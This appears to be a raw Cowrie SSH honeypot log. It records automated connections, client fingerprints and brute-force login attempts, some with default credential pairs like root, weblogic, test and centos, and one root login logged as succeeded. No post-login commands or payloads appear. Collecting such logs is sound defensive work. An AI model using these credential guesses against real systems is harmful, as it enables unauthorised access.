{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:26:37.930818Z","src_ip":"212.227.235.229","session":"89e33024e3da"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:26:38.370458Z","src_ip":"212.227.235.229","session":"89e33024e3da"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:26:38.490597Z","src_ip":"212.227.235.229","session":"89e33024e3da"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:26:38.491574Z","src_ip":"212.227.235.229","session":"9dc53bbaa4c3"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":53242,"dst_ip":"1.2.3.4","dst_port":22,"session":"0365c13b4032","protocol":"ssh","message":"New connection: 45.125.211.194:53242 (1.2.3.4:22) [session: 0365c13b4032]","sensor":"my-vps","timestamp":"2025-08-28T03:26:40.532985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:26:40.551370Z","src_ip":"45.125.211.194","session":"0365c13b4032"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:26:40.745389Z","src_ip":"45.125.211.194","session":"0365c13b4032"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"weblogic","message":"login attempt [weblogic/weblogic] failed","sensor":"my-vps","timestamp":"2025-08-28T03:26:41.575107Z","src_ip":"45.125.211.194","session":"0365c13b4032"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57094,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d9f5f88248a","protocol":"ssh","message":"New connection: 212.227.125.160:57094 (1.2.3.4:22) [session: 0d9f5f88248a]","sensor":"my-vps","timestamp":"2025-08-28T03:26:42.530532Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:26:42.532521Z","src_ip":"212.227.125.160","session":"0d9f5f88248a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:26:42.747268Z","src_ip":"212.227.125.160","session":"0d9f5f88248a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:26:42.785237Z","src_ip":"45.125.211.194","session":"0365c13b4032"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"abc123","message":"login attempt [ftpuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:26:43.610860Z","src_ip":"212.227.125.160","session":"0d9f5f88248a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:26:44.828876Z","src_ip":"212.227.125.160","session":"0d9f5f88248a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39302,"dst_ip":"1.2.3.4","dst_port":22,"session":"82e08f6e5772","protocol":"ssh","message":"New connection: 212.227.125.160:39302 (1.2.3.4:22) [session: 82e08f6e5772]","sensor":"my-vps","timestamp":"2025-08-28T03:26:49.255044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:26:49.256202Z","src_ip":"212.227.125.160","session":"82e08f6e5772"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:26:49.470781Z","src_ip":"212.227.125.160","session":"82e08f6e5772"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-28T03:26:50.332036Z","src_ip":"212.227.125.160","session":"82e08f6e5772"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50186,"dst_ip":"1.2.3.4","dst_port":22,"session":"00abd03ca9c7","protocol":"ssh","message":"New connection: 212.227.235.229:50186 (1.2.3.4:22) [session: 00abd03ca9c7]","sensor":"my-vps","timestamp":"2025-08-28T03:26:51.043783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:26:51.044735Z","src_ip":"212.227.235.229","session":"00abd03ca9c7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:26:51.301808Z","src_ip":"212.227.235.229","session":"00abd03ca9c7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:26:51.548998Z","src_ip":"212.227.125.160","session":"82e08f6e5772"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-28T03:26:52.073402Z","src_ip":"212.227.235.229","session":"00abd03ca9c7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:26:53.347824Z","src_ip":"212.227.235.229","session":"00abd03ca9c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49740,"dst_ip":"1.2.3.4","dst_port":22,"session":"77a94cc6422b","protocol":"ssh","message":"New connection: 212.227.125.160:49740 (1.2.3.4:22) [session: 77a94cc6422b]","sensor":"my-vps","timestamp":"2025-08-28T03:26:54.260558Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:26:54.261426Z","src_ip":"212.227.125.160","session":"77a94cc6422b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:26:54.486073Z","src_ip":"212.227.125.160","session":"77a94cc6422b"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"123456","message":"login attempt [gitlab/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:26:55.165912Z","src_ip":"212.227.125.160","session":"77a94cc6422b"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":19361,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ef880c20621","protocol":"ssh","message":"New connection: 45.125.211.194:19361 (1.2.3.4:22) [session: 2ef880c20621]","sensor":"my-vps","timestamp":"2025-08-28T03:26:55.307181Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:26:55.330131Z","src_ip":"45.125.211.194","session":"2ef880c20621"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:26:55.518608Z","src_ip":"45.125.211.194","session":"2ef880c20621"}
{"eventid":"cowrie.login.failed","username":"centos","password":"123456","message":"login attempt [centos/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:26:56.346891Z","src_ip":"45.125.211.194","session":"2ef880c20621"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:26:56.392214Z","src_ip":"212.227.125.160","session":"77a94cc6422b"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:26:57.557030Z","src_ip":"45.125.211.194","session":"2ef880c20621"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48684,"dst_ip":"1.2.3.4","dst_port":22,"session":"7dc1e8ff1906","protocol":"ssh","message":"New connection: 212.227.235.229:48684 (1.2.3.4:22) [session: 7dc1e8ff1906]","sensor":"my-vps","timestamp":"2025-08-28T03:27:01.794509Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:27:01.795704Z","src_ip":"212.227.235.229","session":"7dc1e8ff1906"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T03:27:01.901464Z","src_ip":"212.227.235.229","session":"7dc1e8ff1906"}
{"eventid":"cowrie.login.failed","username":"clay","password":"clay","message":"login attempt [clay/clay] failed","sensor":"my-vps","timestamp":"2025-08-28T03:27:02.222587Z","src_ip":"212.227.235.229","session":"7dc1e8ff1906"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:03.331764Z","src_ip":"212.227.235.229","session":"7dc1e8ff1906"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42388,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fcaabe33970","protocol":"ssh","message":"New connection: 212.227.125.160:42388 (1.2.3.4:22) [session: 4fcaabe33970]","sensor":"my-vps","timestamp":"2025-08-28T03:27:05.800446Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:27:05.801227Z","src_ip":"212.227.125.160","session":"4fcaabe33970"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:27:06.018052Z","src_ip":"212.227.125.160","session":"4fcaabe33970"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker","message":"login attempt [worker/worker] failed","sensor":"my-vps","timestamp":"2025-08-28T03:27:06.668334Z","src_ip":"212.227.125.160","session":"4fcaabe33970"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:07.886912Z","src_ip":"212.227.125.160","session":"4fcaabe33970"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53272,"dst_ip":"1.2.3.4","dst_port":22,"session":"46e6895a3917","protocol":"ssh","message":"New connection: 212.227.235.229:53272 (1.2.3.4:22) [session: 46e6895a3917]","sensor":"my-vps","timestamp":"2025-08-28T03:27:08.609658Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:27:08.610538Z","src_ip":"212.227.235.229","session":"46e6895a3917"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:27:08.858422Z","src_ip":"212.227.235.229","session":"46e6895a3917"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker","message":"login attempt [worker/worker] failed","sensor":"my-vps","timestamp":"2025-08-28T03:27:09.604136Z","src_ip":"212.227.235.229","session":"46e6895a3917"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":37061,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b2ea6da19d7","protocol":"ssh","message":"New connection: 45.125.211.194:37061 (1.2.3.4:22) [session: 2b2ea6da19d7]","sensor":"my-vps","timestamp":"2025-08-28T03:27:10.134303Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:27:10.157770Z","src_ip":"45.125.211.194","session":"2b2ea6da19d7"}
